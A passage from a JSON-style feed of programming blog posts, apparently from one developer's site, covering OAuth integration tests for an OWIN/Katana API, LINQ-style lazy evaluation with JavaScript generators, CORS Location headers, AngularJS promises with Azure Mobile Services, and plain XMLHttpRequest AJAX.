KeyValuePair<string, string>("grant_type", "password"), new KeyValuePair<string, string>("username", Username), new KeyValuePair<string, string>("password", Password) }; var tokenPostData = new FormUrlEncodedContent(tokenDetails); var tokenResult = server.HttpClient.PostAsync("/Token", tokenPostData).Result; Assert.AreEqual(HttpStatusCode.OK, tokenResult.StatusCode); var body = JObject.Parse(tokenResult.Content.ReadAsStringAsync().Result); token = (string)body["access_token"]; } Alright, what we’re doing here is:\nCreating the details which are needed to be POSTed, this is the standard data you’d provide to an OAuth request URL Encode the data Hit the /Token route with the data Assert that it was a successful request Extract the token from the response, I’m just reading it out as JSON (which it is) and not worrying about strongly typing it Side note - you’ll notice that I’m using PostAsync(...).Result and not async & await. The reason for this is a limitation in MSTest (and NUnit), you’re setup can’t have a return type (ie - async Task) so you’re stuck with async void which gets dodgy quickly. 
It’s easier to just do it synchronously.\nWith our authentication written we now need to make sure that we are passing it through on the request:\nprotected override async Task<HttpResponseMessage> GetAsync() { return await server.CreateRequest(Uri) .AddHeader("Authorization", "Bearer " + token) .GetAsync(); } Really the only difference in GetAsync (and PostAsync) is that we add the Authorization header and properly format it to contain our bearer token.\nEasy, we can now write a test like so:\n[TestClass] public class ValuesAuthenticatedControllerTests : BaseAuthenticatedTests { [TestMethod] public async Task ShouldGetValuesWhenAuthenticated() { var response = await GetAsync(); var values = await response.Content.ReadAsAsync<IEnumerable<string>>(); Assert.AreEqual(2, values.Count()); } protected override string Uri { get { return "/api/values"; } } } And we’re done!\nConclusion So through this post we’ve seen how we can use OWIN/Katana’s self-hosting feature to host our API in-memory and then make requests against an authenticated API. We’ve also abstracted away the authentication part of our integration tests so we don’t need to think about it for each test which we write.\nI’ve published the code used for this blog here on GitHub so feel free to get it and have a play.\n", "id": "2014-01-12-integration-testing-katana-with-auth" }, { "title": "LINQ in JavaScript, ES6 style, for real this time", "url": "https://www.aaron-powell.com/posts/2013-12-31-linq-in-javascript-for-real/", "date": "Tue, 31 Dec 2013 00:00:00 +0000", "tags": [ "javascript", "linq", "es6" ], "description": "Revisiting how to implement LINQ in JavaScript on top of ES6 but this time it's actually going to be on top of ES6 features!", "content": "In a recent post I talked about writing LINQ in JavaScript using ES6 iterators but then had to take my words back after it was pointed out to me that I wasn’t actually using ES6 generators.\nWell some time has passed and I’ve reworked my previous library to actually use the iterators and generators from ES6, so let’s have a look at how to get going with it.\nLazy evaluating collections Let’s start simple, let’s take an array and make it lazy evaluated. To do this I’m going to create a generator function that deals with the iterations through the array:\nlet lazyArray = function* (...args) { for (let i = 0; i < args.length; i++) { yield args[i]; } }; There’s a few new things here to look at:\nfunction* - this is a new syntax as part of ES6 and what it is doing is telling the JavaScript runtime that this function is a generator function. This is important if we want to use yield to return values as yield (and yield* which I won’t be covering) can only be used inside a generator function. Side note: At the time of writing Firefox Nightly allows you to use yield outside of generator functions, yay bleeding edge! ...args - I’ve used this mostly for convenience, splats are coming in ES6 and it’s so much easier to get arguments as arrays this way let - as you should know JavaScript is function scoped not block scoped (which C# is) so when you declare a variable, regardless of where you declare it, it’ll always be available in the function. Well that was before we had ES6 and let.
let allows you to create block scoped variables and as I play with more ES6 I find that I prefer to use let over var for declaring variables as it brings a more sane scope to what I’m declaring Now let’s use it:\nlet arr = lazyArray(0,1,2,3,4,5,6,7,8,9); Awesome, we’ve got our lazy array, not quite as nice as using [0,1,2,3...], but it’s acceptable, so now we can do stuff with it, like read the values out:\nfor (let x of arr) { console.log(x); } Again we’re seeing some new syntax, this time in the form of a for-of statement. This is used to iterate through the results of a generator function. Since this function is lazy evaluated we don’t have array indexers or anything on it, instead we have a next method which tells it we want the next iteration of the function which is similar to IEnumerator and it’s MoveNext method. In fact we could write something like this:\nconsole.log(arr.next().value); //0 console.log(arr.next().value); //1 //and so on The result of next() returns us an object like so:\n{ done: true|false, value: value|undefined } So to decompose our for-of look it’s more like this:\nlet x; while (!(x = arr.next()).done) { console.log(x.value); } What we’re saying is “While the generator isn’t done get the next and output the value”. Personally I think the for-of syntax is much nicer, but there’s advantaged to accessing items at your choosing, just like using the IEnumerator interface in C# has its advantages.\nBuilding filtering for our generator functionThe problem with our lazyArray is that we have no way which we would be able to filter it, although it’s array like it’s not an array and we can’t make it an array without loosing our lazy evaluation. So instead we’ll start augmenting the function prototype:\nlazyArray.prototype.where = function* (fn) { for (let item of this) { if (fn(item)) { yield item; } } }; This works in a very smooth fashion, you’ll see that we’re doing for (let item of this), that’s because we’re augmenting a generator function, so we are lazy evaluating our “parent” collection, we can just for-of loop over that.\nAnd ultimately what it means is we can do this:\nfor (let x of arr.where(i => i % 2)) { console.log(x); } //Note: I'm using the fat arrow syntax from ES6 to make it more lambda-esq, but you can use a "normal function" instead. Sweet, we’re filtering down to only items that are odd numbers!\nTransforming the itemsWhat’s filter without map (well… where without select)? Again that’s pretty easy to add by just augmenting our lazyArray prototype:\nlazyArray.prototype.select = function* (fn) { for (let item of this) { yield fn(item); } }; So we could do something like creating squares of everything:\nfor (let x of arr.select(i => i * i)) { console.log(x); } ChainingNow being able to do a single manipulation on a collection that is lazy is good, but really you’re more likely to do a filter then a map, well let’s go ahead:\nfor (let x of arr.where(i => i % 2).select(i => i * i)) { console.log(x); } Hmm that’s a syntax error, apparently our where function doesn’t have a select method, well you’d be right on spotting that. 
The reason is we’ve been manipulating the lazyArray prototype, but we also need to manipulate the prototype of these new functions too, but to do that we’ll have to assign them to variables rather than having them as anonymous functions:\nlet where = function* where(fn) { for (let item of this) { if (fn(item)) yield item; } }; let select = function* select(fn) { for (let item of this) { yield fn(item); } }; lazyArray.prototype.where = where; lazyArray.prototype.select = select; where.prototype.select = select; where.prototype.where = where; select.prototype.where = where; select.prototype.select = select; And then we can:\nfor (let x of arr.where(i => i % 2).select(i => i * i)) { console.log(x); } Or even:\nfor (let x of arr.select(i => i * i).select(i => i * i)) { console.log(x); } Now using your imagination you can see how other LINQ methods can be implemented.\nMultiple enumerationsNow this is where it’ll get tricky, unlike C# JavaScript generator functions can’t be iterated over multiple times, once a generator is spent it’s spent. This will be a problem if you want to do something like this:\nif (arr.any()) { for (let x of arr) { //stuff } } For an any() to work you need to walk the generator, but when you’ve walked it once you can’t walk it again, so how can do address that? The easiest way is to do what ReSharper suggests to me all the time in C#, get the collection in to an array, but doing so looses the laziness of our collection.\nInstead what I’ve done with LINQ in JavaScript is wrapped the enumerable in another function so you have to invoke it to get the generator, like so:\nif (arr.any()) { for (let x of arr()) { //stuff } } So our arr object is actually a non-generator function and you have to invoke it to use walk it, but to make it nicer to work with I’ve made functions like any() take care of that for you so you don’t have to arr().any() as I think that’d be a code smell. But this does mean that the result of a call to where or select will need to be invoked like so:\nfor (let item of arr.where(x => x % 2)()) { console.log(item); } But really I’m of the opinion you shouldn’t be doing your lambda expressions inside of the for-of declaration anyway so I think that it’s fine.\nWrapping upWell there we have it, how we can use ES6 generators to create LINQ in JavaScript which is actually lazy evaluated. I’ve gone ahread and published the code which I’ve been working on to my GitHub repo and you can also get it via npm if you’re using Node.js 0.11.4 or higher (and turn on the harmony features of v8). So go one, check out the tests for some fun examples of what you can do like:\ndescribe('Interesting API usages', function () { it('should calc prime numbers', function () { var range = Enumerable.range(3, 10); var primes = range.where(n => Enumerable.range(2, Math.floor(Math.sqrt(n))).all(i => n % i > 0)); var expectedPrimes = [3, 5, 7]; var index = 0; for (let prime of primes()) { expect(prime).to.equal(expectedPrimes[index]); index++; } }); }); ", "id": "2013-12-31-linq-in-javascript-for-real" }, { "title": "Accessing the Location header in a CORS-enabled API", "url": "https://www.aaron-powell.com/posts/2013-11-28-accessing-location-header-in-cors-response/", "date": "Thu, 28 Nov 2013 00:00:00 +0000", "tags": [ "asp-net", "ajax", "cors" ], "description": "Dealing with the case of the missing Location header in an ASP.Net WebAPI response.", "content": "Today I hit a problem, we’ve got an ASP.Net WebAPI 2 project which is providing a series of REST services for a web app. 
These services are hosted on a different domain to the one the app will be hosted on, so to perform the requests to them we’ve gone ahead and enabled CORS.\nUp until now most of our work has been doing read-only endpoints in the API, but I just finished off implementing a POST route. Now in a RESTful API a POST should return a 201 Created response along with the location at which you’ll find the newly created resource. So in WebAPI I have something like this:\nvar response = Request.CreateResponse(HttpStatusCode.Created, createdItemId); response.Headers.Location = new Uri(Url.Link("SomeRoutes", new { id = createdItem })); Which sees me having a Location header in my response.\nNext I want to read out the Location header and then follow it to get the data and display it on screen. I’m using AngularJS for this but the principle is the same for any way you’re performing an AJAX request:\n$http.post(someUrl, someData) .then(function (response) { var location = response.headers('Location'); return $http.get(location); }) .then(function (response) { console.dir(response.data); }); Only there’s a problem, location is always undefined! I’m looking in my network tab in the dev tools and I can clearly see that there is a Location header returned but when I try and read it in JavaScript it’s never there.\nFrustrated I turned to the googles and was not having much luck, everyone just said response.headers('Location') and you’ll have your header, but I was never seeing it from Angular, or even in the raw xhr object. Something must be wrong.\nAfter some more digging I came across this. Little did I know that if you’re enabling CORS it will only expose a small number of the available headers by default; if you want more you have to expose them explicitly.\nSo back in our WebAPI controller action I added the following:\nvar corsResult = new CorsResult(); corsResult.AllowedExposedHeaders.Add("Location"); response.WriteCorsHeaders(corsResult); My API is already CORS enabled, all I’m doing is telling it that it’s a CORS response and I want some additional headers exposed cross-origin.\nAnd now I’m able to read my Location header in JavaScript.\n", "id": "2013-11-28-accessing-location-header-in-cors-response" }, { "title": "Azure Mobile Services, AngularJS and broken promises", "url": "https://www.aaron-powell.com/posts/2013-09-16-azure-angular-and-broken-promises/", "date": "Mon, 16 Sep 2013 00:00:00 +0000", "tags": [ "azure-mobile-services", "angularjs", "promise" ], "description": "A look at how to use Azure Mobile Services with AngularJS and dealing with what I believe is a broken approach to the AngularJS promise API.", "content": "There’s no denying that AngularJS is the hot new SPA framework these days as it offers a lot of very nice features out of the box, has a very good programming model behind it and works as advertised. So when a new project was kicking off that I was on I decided to take the opportunity to use it so I could get a feel for it. Overall my feelings have been positive with the exception of what I want to talk about here.\nBringing in Azure Mobile Services For this project I’ve been working with Azure Mobile Services as I’ve got data coming from some native mobile apps that needs to be managed via the website.
So AMS has its own JavaScript client to work with that’s quite a nice little library, you do things like so:\nclient.getTable('members').insert(newMember).then(function () { console.log('member has been inserted with id: ' + newMmeber.id) }); client.getTable('members').where(function () { return this.active; }).read().then(function (members) { console.log('You have ' + members.length + ' active members'); }); Under the covers this is a REST API so it’s doing HTTP requests out to Azure, handling the response and then using its own Promise API (which conforms to the Promise spec) to publish out to listeners.\nAbstracting Azure Mobile ServicesAngularJS has support for dependency injection which is a really nice feature when you’re looking to modularize your project. So for this project I decided to create a factory which would expose AMS and then another which would expose friendly methods to wrap up the bits of functionality I wanted, meaning that if you were to unit test it you wouldn’t directly depend on AMS, just an interface.\nSo I started with this as a module:\nangular.module('azure', []) .factory('client', ['$window', function ($window) { var azureSettings = //get them how you will var client = new $window.WindowsAzure.MobileServiceClient( "https://" + azureSettings.name + ".azure-mobile.net/", azureSettings.key ); return client; }]); And now I can create a factory for my “services”, so we’ll start with this:\nangular.module('api', ['azure']) .factory('services', ['client', function (client) { //TODO }]); Lastly I could setup a controller:\nangular.module('app', ['api']) .controller('MyController', ['$scope', 'services', function ($scope, services) { }]); Now we can set about creating our service. We’ll do your typical todo item app, so for that I want to have a method on my service that’ll expose all todo items:\nangular.module('api', ['azure']) .factory('services', ['client', function (client) { return { getAll: function () { return client.getTable('todo').read(); } }; }]); Because this is promise based we can .then the call and populate our UI:\nangular.module('app', ['api']) .controller('MyController', ['$scope', 'services', function ($scope, services) { $scope.items = []; services.getAll().then(function (items) { $scope.items = items; }); }]); AngularJS’s broken promiseI quite like the concept of Promises in JavaScript, and I know some people have issues with them, but all-in-all it’s nicer to work with than callback trees, especially when it comes to working with multiple async operations. One of the core principles is that when the operation completes it will either be resolved or rejected and you can provide handlers for the appropriate states.\nLooking back at the code up there, knowing that Azure Mobile Services will return a promise do you see anything wrong in the either the service or the controller which would prevent the success callback from being invoked?\nNo? Me either, but it won’t be called.\nAnd this is where we get to what I’m referring to as AngularJS’s broken promise. The fact is that the callback won’t be run, and that’s rather annoying, really hard to debug and not obvious at all.\nBefore we go much further I just want to clarify that I’m not an AngularJS expert, I’ve been using it for a grand total of 3 weeks so this is based on my expectations as a JavaScript developer.\nEverything in AngularJS is wrapped up in scopes and only within the space of a running scope can you interact with an AngularJS model (such as your controller). 
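To make that concrete, here’s a minimal sketch of the difference (assuming a controller-injected $scope and a plain setTimeout, which AngularJS knows nothing about; the property name is made up for illustration):

setTimeout(function () {
    $scope.message = 'updated'; // the model changes, but no digest runs, so the view never refreshes
}, 1000);

setTimeout(function () {
    $scope.$apply(function () {
        $scope.message = 'updated'; // wrapped in $apply, a digest runs and the view picks up the change
    });
}, 1000);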
Anything that breaks out of an AngularJS scope will then need to notify AngularJS that it’s completed and you can be on your way.\nSo the problem that I’m hitting is that I’m creating an XHR, which because it’s asynchronous, will break out of an AngularJS scope and eventually complete. Because you are then “out of the scope” the Promise callbacks are somehow blocked by AngularJS (I’ve not been able to work out how they prevent it from firing but they somehow do).\nFixing the broken promise The good news is that you can work around this and I’ll admit that this may not be the cleanest solution because it was determined by trial-and-error, but none the less you can solve the problem and that’s by calling $apply on the root scope before your promise tries to return. Annoyingly this means you have to create your own promise to wrap the AMS promise but AngularJS does ship with a slimmed down version of Q in the form of $q.\nThe resulting code now looks like this:\nangular.module('api', ['azure']) .factory('services', ['client', '$q', '$rootScope', function (client, $q, $rootScope) { return { getAll: function () { var d = $q.defer(); client.getTable('todo').read().then(function () { d.resolve.apply(this, arguments); $rootScope.$apply(); }, function () { d.reject.apply(this, arguments); $rootScope.$apply(); }); return d.promise(). } }; }]); Here you’ll see that we’re creating a deferred object, and then returning its promise (meaning our controller doesn’t need to be refactored, just our factory). We then add our own success handler (and fail handler) which pass through to .resolve and .reject for success and fail, providing the arguments, meaning that this solution doesn’t need to know about the argument changes. Once that’s done we then call $rootScope.$apply() which will inform AngularJS that our async operation has completed, and now the handlers in our controller will be executed.\nBeware of opinionated frameworksSo the main problem I was experiencing was supped up in this tweet:\n@slace normally, you wouldn't need to do this as a digest cycle would be triggered by angular if you were using its own services.\n— James Sadler (@freshtonic) August 23, 2013 The problem is you’re not doing in the AngularJS way. When I was trying to work out why it wasn’t working people kept pointing out that “if you just used the built in $http service you wouldn’t have that problem”. 
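For reference, the sort of thing they were suggesting looks roughly like this (a hedged sketch against a hypothetical /tables/todo endpoint, rather than going through the AMS client library):

angular.module('app', [])
    .controller('MyController', ['$scope', '$http', function ($scope, $http) {
        $scope.items = [];
        $http.get('/tables/todo').then(function (response) {
            // $http resolves its promises inside Angular's digest, so no $apply is needed here
            $scope.items = response.data;
        });
    }]);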
But really that’s not the case, using the $http service just handles it for you, so it’s still a problem with any XHR operations in AngularJS, they just hide some of it from you.\nSo just be aware that when you’re using an opinionated library once you step outside “the norm” be prepared for things to not work as you’d expect.\nConclusionI’d really like to create a wrapper around the Azure Mobile Services API but they don’t seem to expose their promise API which is where I’d like to wrap, I’m going to keep trying and will update if I can find a cleaner solution.\nIn the mean time you’ll need to be aware that when you’re using Azure Mobile Services with AngularJS it’s not quite as simple as you’d expect it to be.\n", "id": "2013-09-16-azure-angular-and-broken-promises" }, { "title": "LINQ in JavaScript, ES6 style clarification", "url": "https://www.aaron-powell.com/posts/2013-09-16-linq-in-javascript-es6-clarification/", "date": "Mon, 16 Sep 2013 00:00:00 +0000", "tags": [ "javascript", "linq", "es6" ], "description": "A quick clarification on my previous post about LINQ in JavaScript using ES6 features.", "content": "I recently blogged about implementing LINQ in JavaScript with ES6 iterators. While I’d done a bunch of research, played around with FireFox (which seemed to have the most up-to-date implementation) and thought it was all well and good.\nUnfortunately it turns out that what I was talking about was the __iterator__ syntax which FireFox has implemented but it’s not in line with the current iterator and generator approach.\nSo while I did state that the code was against an API that wasn’t set in stone I was a bit further away from where I wanted to be going forward.\nThanks Domenic for picking up on it and pointing me in the right direction, I’m in the process of reworking the library to work with what’s actually outlined so far in ES6 and you can check out the progress.\n", "id": "2013-09-16-linq-in-javascript-es6-clarification" }, { "title": "Using bluesky in Azure Mobile Services", "url": "https://www.aaron-powell.com/posts/2013-09-11-using-bluesky-in-azure-mobile-services/", "date": "Wed, 11 Sep 2013 00:00:00 +0000", "tags": [ "azure-mobile-services" ], "description": "A quick tip on how to use `bluesky` from Azure Mobile Services.", "content": "I’ve been doing some work with Azure Mobile Services where I’m storing data in tables and blobs. For a task I need to have a custom API which will remove some data from a table and then the blobs associated with it.\nFor this I’m creating a new custom API and because it’s just a Node.js app I’d be using the Node SDK. When I was getting started I got pointed towards bluesky which is a nice little wrapper around the Azure SDK to make it a bit easier to work with.\nSo I npm install‘ed it into the git repo for my mobile service, used the API and pushed it up to Azure.\nAnd then…\nremote: One or more errors occurred. remote: Error - Changes committed to remote repository but deployment to website failed, please check log for further details. Well I spun up the CLI and check my logs but nothing, there wasn’t anything in there that indicated the problem. In fact my server was still running but it wasn’t running the scripts that I’d just pushed. This is annoying, I’ve got no logs, a failing server and no indication as to why. 
Deleting the module and pushing again meant the server started up, but then obviously I can’t use the module.\nI put the question to my friend Glenn Block as he pointed me to the library to see if he knew what the problem might be, or at least how to find the logs. He suggested that the problem might be due to the path length: Windows has limitations on the length of file paths, and when you start looking at the dependency graph for the module it gets crazy, in particular because it takes a dependency on the Azure SDK (which in turn has its own dependency chain each with dependencies, and so on).\nAfter some investigation it turned out that if you don’t include the Azure SDK dependency then it deploys fine, bluesky doesn’t work, but at least the deployment works… Baby steps ;).\nSo how do we work around that? It struck me that when you’ve got these scripts deployed to your AMS instance the Azure SDK is already available, you don’t need to include it in your repository, you just do:\nvar azure = require('azure'); And you have the SDK at your fingertips.\nNow, conveniently bluesky takes this into account already! Rather than passing your credentials in like so:\nvar storage = require('bluesky').storage({ account: '...', key: '...' }); You can provide it with Azure services:\nvar azure = require('azure'); var storage = require('bluesky').storage({ blobService: azure.createBlobService('account', 'key').withFilter(new azure.LinearRetryPolicyFilter()), tableService: azure.createTableService('account', 'key').withFilter(new azure.LinearRetryPolicyFilter()), queueService: azure.createQueueService('account', 'key').withFilter(new azure.LinearRetryPolicyFilter()) }); And there we have it, we can use the Azure SDK that’s already on the server and avoid the path depth problem.\n", "id": "2013-09-11-using-bluesky-in-azure-mobile-services" }, { "title": "LINQ in JavaScript, ES6 style", "url": "https://www.aaron-powell.com/posts/2013-09-06-linq-in-javascript-es6/", "date": "Fri, 06 Sep 2013 00:00:00 +0000", "tags": [ "javascript", "linq", "es6" ], "description": "It's been a few years since I last blogged about the concept of LINQ in JavaScript as a lot has changed in the JavaScript landscape.\n\nSo let's revisit the idea of it with a look at how you could leverage LINQ in JavaScript for ES6.", "content": "Update #1 The code I’ve talked about here isn’t actually ES6 related, instead it’s about an API only in FireFox, read more here.\nBack in 2010 I posted about implementing LINQ in JavaScript in which I had a look at what would have been involved if you were writing a LINQ style API in JavaScript. Keep in mind that back in 2010 we didn’t have libraries like Underscore or LoDash, nor were people all that aware of the Array.prototype extensions map/filter/reduce. So when it came to collection manipulation the most common approach was via the good ol’ for loop, but as I’ve said in the past for loops are uncool.\nBut with my implementation of LINQ in JavaScript, and the others out there that I’ve come across (including Underscore/LoDash), there is one thing that always annoyed me: they are eagerly evaluated.\nLet’s say you’re displaying a paged list of records, and also have custom filters that people can apply.
So we’d need to do three things for this:\nApply a filter to a collection Transform a collection of objects to a collection of DOM elements (or DOM strings) Grab the subset of records required This would result in something like this:\nvar rows = people.filter(function (person) { return person.age > 30; }).map(function (person) { //removed for simplicity }).slice(0, 5); So this has to be eager evaluated, if we’ve got 500 records in our people collection and 250 of them are going to match the filter we still have to process all 500 in the filter, then 250 in the map’s before we take the 5 that we want to show on the current page. Now admittedly we can move the .slice(0, 5) to before the map and then we’d map the subset but you still go into the slice having put the whole collection through the filter.\nAnd this is where I like LINQ, it’s lazy evaluated, if we did the same thing:\nvar rows = people .Where(person => person.Age > 30) .Select(person => /* removed for simplicity */) .Take(5); Here the collection manipulation is processed only once you iterate over it rows, and only the first 5 that match the Where filter will be used, it will stop once it hits that. And this all comes down to the fact that C# implements Iterators through the IEnumerable interface.\nEnter ES6 Good news everybody, ECMAScript 6 has a proposal forward to add iterators to ECMAScript/JavaScript which means we can create lazy evaluated objects, more specifically, lazy evaluated collections.\nNote: This is a draft spec so what I’m doing only works in Firefox Nightly and may stop working at some random point.\nTo create an iterator object you need to add a member of __iterator__ that is a function that yields a result, here’s a basic iterator:\nvar iterator = { __iterator__: function () { yield 1; yield 2: yield 3; } }; We can then iterate over it using a for-in loop like so:\nfor (let val in iterator) { console.log(val); } // 1, 2, 3 You could then make an iterater version of an array:\nvar iteratableArray = function (array) { return { __iterator__: function () { for (let i = 0; i < array.length; i++) { yield array[i]; } } }; }; So now you can do nothing really any different:\nvar arr = iteratableArray([1, 2, 3, 4]); for (let val in arr) { console.log(val); } But where it gets really powerful is in the lazy evaluation, let’s update to if we have a function passed in we’ll return the evaluation of it:\nvar iteratableArray = function (array) { return { __iterator__: function () { for (let i = 0; i < array.length; i++) { if (typeof array[i] == 'function') yield array[i](); else yield array[i]; } } }; }; Now we’ll create our object:\nvar arr = iteratableArray([function () { throw 'Bad'; }]); The exception won’t be thrown until we iterate through the collection:\nfor (var x in arr) { console.log(x); } (Yes it’s a contrived example but we’ll move on from that.)\nImplementing LINQNow we’ve seen the basics of how you would create something that’s an iterable collection, and this is the basis of how we could implement LINQ. 
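Before building that, here’s a quick sketch of the laziness we’re relying on, reusing the iteratableArray from above (same __iterator__/for-in style this post is written against; the logging is purely for illustration):

var lazy = iteratableArray([function () { console.log('evaluating'); return 42; }, 1]);
console.log('nothing has run yet'); // the function in the array hasn't been invoked
for (let val in lazy) {
    console.log(val); // logs 'evaluating' then 42, then 1 - evaluation only happens as we iterate
}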
For this I’m going to create an Enumerable type that we’ll work against:\nvar Enumerable = function (array) { if (typeof this === 'undefined' || this.constructor !== Enumerable) { return new Enumerable(array); } this._array = array; }; This is a constructor function (that doesn’t have to be used with the new operator) that we’ll pass an array in (I’m not doing error checking at the moment, be nice :P).\nI’ve then got an __iterator__ function:\nvar __iterator__ = function() { for (var i = 0; i < this._array.length; i++) { yield this._array[i]; }; }; Which is then added to the Enumerable’s prototype:\nEnumerable.prototype.__iterator__ = __iterator__; And it works the same as our previous function, now we can start implementing more methods on the prototype. Let’s start with the Where method so we can filter the collection:\nvar where = function (fn) { return new WhereEnumerable(this, fn); }; Enumerable.prototype.where = where; Enumerable.prototype.filter = where; //just so it's more JavaScript-y Wait, what’s this WhereEnumerable that we’re creating? Well since we want to chain this up and not have a really complex object that we keep modifying I’ve created another “class” to handle the filtering concept. This is similar to what LINQ does, it has a number of internal types that handle the different iterator concepts. Let’s start implementing it:\nvar WhereEnumerable = (function (__super) { __extends(WhereEnumerable, __super); function WhereEnumerable(enumerable, fn) { __super.call(this, enumerable._array); this._enumerable = enumerable; this._fn = fn; }; return WhereEnumerable; })(Enumerable); I’m using one of the fairly common class patterns in JavaScript and I was lazy and grabbed some auto-generated code from a TypeScript project for doing class inheritance, but basically what I’m doing is:\nCreating a new constructor function that will invoke the Enumerable constructor function Capture the “parent” enumerable object Store the filtering function Now we’d better implement the __iterator__ method:\nWhereEnumerable.prototype.__iterator__ = function() { var index = 0; for (let item in this._enumerable) { if (this._fn(item, index)) { yield item; } index++; } }; It’s a pretty simple method to understand we:\nUse a for-in loop to step through each value of the parent enumerable Apply the function to the value and it’s index If the function returns truthy yield the item, else skip it Neat now we can do this:\nvar enumerable = Enumerable([1, 2, 3, 4]); var odds = enumerable.where(x => x % 2); Now we have an unevaluated collection filter, and until we step into the collection it’ll stay that way.\nStepping it up with chainingThe really powerful aspect of LINQ is its chaining capability, that you can apply multiple “query” operations to get a result, like our original example. So now let’s add a Count method:\nvar count = function () { var count = 0; for (let item in this) { count++; } return count; }; Enumerable.prototype.count = count; This means we could do this:\nconsole.log(enumerable.count()); //4 console.log(odds.count()); //2 Because our WhereEnumerable type inherits from the Enumerable class, when we augment that prototype it filters through. Neat! Now we could even do this:\nvar notOne = odds.where(x => x > 1); console.log(notOne.count()); //1 And if you were to debug through it keeps doing the __iterator__ method for the parent Enumerable object, meaning it’ll ask for 1, pass it to the initial filter, x => x % 2 and then to x => x > 1 since it passed the first where call. 
The next item through will fail the first where and won’t be passed to the second. Neat!\nSelectSay we want to implement Select (which is map in JavaScript land), again I’m creating a new Enumerable subclass:\nvar SelectEnumerable = (function (__super) { __extends(SelectEnumerable, __super); function SelectEnumerable(enumerable, fn) { __super.call(this, enumerable._array); this._enumerable = enumerable; this._fn = fn; }; SelectEnumerable.prototype.__iterator__ = function () { var index = 0; for (var item in this._enumerable) { yield this._fn(item, index++); } }; return SelectEnumerable; })(Enumerable); It’s very similar to the WhereEnumerable but we’re returning the result of the provided function. Once added to the Enumerable prototype it means we can do this:\nvar squares = enumerable.select(x => x * x); var oddSquares = enumerable.where(x => x % 2).select(x => x * x); .AllNot all of the methods we’d want to implement are going to require a new subclass to be made, something like All, which returns whether or not every item in the Enumerable matches the predicate, will evaluate immediately. It’s reasonably simple to implement as well:\nvar all = function (fn) { for (let x in this) { if (!fn(x)) { return false; } } return true; }; Enumerable.prototype.all = all; Here it’ll go over each item and if any of them fail the function it’ll return false, otherwise it’s true. Because we’re using a for-in loop against this, which is an Enumerable (or a subclass of it), we step back through all the previous points in the chain.\nBringing it all togetherSo now that we’ve got a bunch of lazy evaluation available we could do something like this:\nvar range = Enumerable.range(100, 1000); var primes = range.where(n => Enumerable.range(2, Math.floor(Math.sqrt(n))).all(i => n % i > 0)); for (let prime in primes) { console.log(prime); } That’s a simple prime number generator, using some more extensions that will generate a range between two numbers (100 and 1000). Pretty neat hey, it finds all 143 prime numbers.\nConclusionAnd there we have it, a look at how we can use iterators to create a lazy-evaluated collection API which brings the power of .NET’s LINQ to JavaScript. You’ll find my LINQ in JavaScript repository here and it includes a bunch of tests for the different parts of the API.\nLike I said this is built against a draft implementation of a spec and is in part another experiment, but I think it’s a cool example of what’s coming in the future of JavaScript.\n", "id": "2013-09-06-linq-in-javascript-es6" }, { "title": "AJAX without jQuery", "url": "https://www.aaron-powell.com/posts/2013-08-02-ajax-without-jquery/", "date": "Fri, 02 Aug 2013 00:00:00 +0000", "tags": [ "javascript", "ajax", "jquery" ], "description": "When was the last time you wrote an AJAX request?\n\nWhen was the last time you did it without relying on jQuery?\n\nIn this article we'll look at how to do just that, how to make an AJAX request without jQuery to better understand what's going on.", "content": "I’m very much of the opinion that the better you know your tools the better you can make intelligent choices about the layers you put over them. One such layer I see constantly used that people tend to use but not really understand is jQuery.
Don’t get me wrong I’m not anti-jQuery or anything, but like I said I believe you should understand your tools before you try and abstract them away.\nSo today I want to look at a really critical part of jQuery, AJAX.\nYou’ve probably written something like this:\n$.ajax({ type: 'get', url: '/foo', success: function (data) { //something with data } }); But what’s that doing under the hood?\nHello XMLHttpRequestIf you’re doing an AJAX request you’re going to need the X part of that and that’s handled through the XMLHttpRequest object. This object is the descendant of the ActiveX object which Microsoft added to early Internet Explorer which kick started the AJAX revolution.\nSo this is the backbone of doing the request and obviously the backbone of what jQuery does under its API, but how do we use it?\nCreating a GET with XMLHttpRequestLet’s look back to our example above, how does that work? Well first things first we need to create an instance of the XMLHttpRequest:\nvar xhr = new XMLHttpRequest(); Now we need to open our request telling it what kind method we want to use and where to go:\nxhr.open('get', '/foo'); Note: There’s a few other arguments which we can pass through, whether you want it to be handled as an async request as well as credentials if you’re doing an authenticated request.\nSince we’ve opened our request we’re probably going to want to do something when it completes right? To do that we rely on the DOM event standard, using the addEventListener method (you can assign event listeners using the on... style but that’s so IE6). Probably the most important event to be listening for is the load event, this is the one that is executed when a successful response is completed:\nxhr.addEventListener('load', function (e) { //handle success }, false); There are other events you can listen for, progress, error and abort which do pretty much what their names state. The progress event is really useful if you’re expecting a request to take a long time to complete, say you’re uploading a file, or expecting a large response, you can listen for this and inform the user of the status, you know, awesome progress bar style.\nBut we’re not done yet, our request is still in a holding pattern, the request hasn’t been issued, that doesn’t happen unless we explicitly make it so, we have to explicitly send the request:\nxhr.send(); You can see it in action here.\nHandling responsesSo you’re probably going to want to do something when the response comes in right? And even more logical is to do something with the response data that comes back. Depending what kind of data you’re getting back you have different ways to work with it. Let’s start with the one you’re most like going to want from an AJAX request, JSON.\nWell the XMLHttpRequest doesn’t really have the concept of JSON, as far as it is concerned this is just text, so we get at it from the responseText property of either the first argument of the event handler or the xhr object itself. With this you would then convert it to a JavaScript object using the JSON API:\nxhr.addEventListener('load', function (e) { var o = JSON.parse(xhr.responseText); //or e.responseText //work with our object }, false); What if you are expecting HTML? Say you’re loading a template or doing another kind of partial page load. For this you’re likely to want the responseXML property. Modern browsers support this, which turns your response content into a DOM snippet you can work with. 
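As a rough sketch of that (assuming a hypothetical /partials/list endpoint that returns an HTML fragment, and asking the browser to parse it for us):

var xhr = new XMLHttpRequest();
xhr.open('get', '/partials/list');
xhr.responseType = 'document'; // ask for a parsed Document rather than plain text
xhr.addEventListener('load', function () {
    var doc = xhr.responseXML; // the DOM snippet, queryable like any other document
    var list = document.importNode(doc.querySelector('ul'), true);
    document.querySelector('#target').appendChild(list);
}, false);
xhr.send();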
